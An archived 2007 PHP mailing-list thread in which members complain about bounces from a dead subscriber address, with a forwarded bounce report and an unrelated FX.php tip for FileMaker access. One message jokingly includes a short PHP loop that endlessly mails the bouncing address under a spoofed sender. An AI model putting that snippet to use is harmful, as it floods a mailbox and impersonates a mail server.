RE: Fwd: Returned mail: User unknown

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



PLEASE I have like 50 from it so far.


-----Original Message-----
From: Daniel Brown [mailto:parasane@xxxxxxxxx] 
Sent: Monday, November 12, 2007 5:31 PM
To: php-general List
Subject:  Fwd: Returned mail: User unknown

    Can an admin or mod please force an unsubscribe on
<adam.randall@xxxxxxxxxxxxxxxxxxxx>?

    I've been getting bounces all day, and I'm sure I'm not the only
one.  Every message I send to the list gives me one of these.

    Either that or we can just make them exceed their ISP mail cap....  >:D

<?
    $to = "adam.randall@xxxxxxxxxxxxxxxxxxxx";
    $headers  = "From: postoffice <postoffice@xxxxxxxxxxxxxxxxxxxx>\r\n";
    $headers .= "X-Mailer: postoffice.(null)\r\n";
    while(1) {
        mail($to,"Stamp: ".time(),"Hello.  Goodbye!",$headers);
    }
?>

---------- Forwarded message ----------
From:  <postoffice>
Date: 12 Nov 2007 15:25:01 -0800
Subject: Returned mail: User unknown
To: Daniel Brown <parasane@xxxxxxxxx>


The original message was received at 2007-11-12 15:21:41 -0800
from postoffice.(null) [10.0.0.1]

   ----- The following addresses had permanent fatal errors -----
<adam.randall@xxxxxxxxxxxxxxxxxxxx>

   -----Transcript of session follows -----
... while talking to postoffice.(null).:
>>> RCPT To:<adam.randall@xxxxxxxxxxxxxxxxxxxx>
<<< 550 5.1.1 unknown or illegal alias: adam.randall@xxxxxxxxxxxxxxxxxxxx
550 <adam.randall@xxxxxxxxxxxxxxxxxxxx>... User unknown

Final-Recipient: RFC822; adam.randall@xxxxxxxxxxxxxxxxxxxx
Action: failed
Status: 5.1.1
Remote-MTA: DNS; postoffice.(null)
Diagnostic-Code: SMTP;550 5.1.1 unknown or illegal alias:
adam.randall@xxxxxxxxxxxxxxxxxxxx
Last-Attempt-Date: 2007-11-12 15:21:41 -0800


---------- Forwarded message ----------
From: "Daniel Brown" <parasane@xxxxxxxxx>
To: "Paul Novitski" <paul@xxxxxxxxxxxxxxxxxxx>
Date: Mon, 12 Nov 2007 18:04:58 -0500
Subject: Re:  PHP access of FileMaker data
On Nov 12, 2007 5:58 PM, Paul Novitski <paul@xxxxxxxxxxxxxxxxxxx> wrote:
> Can someone please point me to some PHP code or documentation for
> accessing FileMaker Pro tables with PHP?  So far googling Zend and
> world-wide hasn't found me what I'm seeking.
>
> Thanks,
> Paul
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>

    Back in 2004 I had a project that was to be a hybrid of PHP and
FileMaker data, and I came across the perfect fit: FX.php by Chris
Hansen.  You can download the full source here:

        http://iviking.org/FX.php/

    It had a mailing list of its own back then, too, which I was
active on, but I'm no longer subscribed, and not even sure if it's
still there.  Either way, you'll find people like my friend, Gjermund
Thorsen, still supporting the community on the script today, so you
won't have to go it alone.


--
Daniel P. Brown
[office] (570-) 587-7080 Ext. 272
[mobile] (570-) 766-8107

If at first you don't succeed, stick to what you know best so that you
can make enough money to pay someone else to do it for you.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php





-- 
Daniel P. Brown
[office] (570-) 587-7080 Ext. 272
[mobile] (570-) 766-8107

If at first you don't succeed, stick to what you know best so that you
can make enough money to pay someone else to do it for you.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux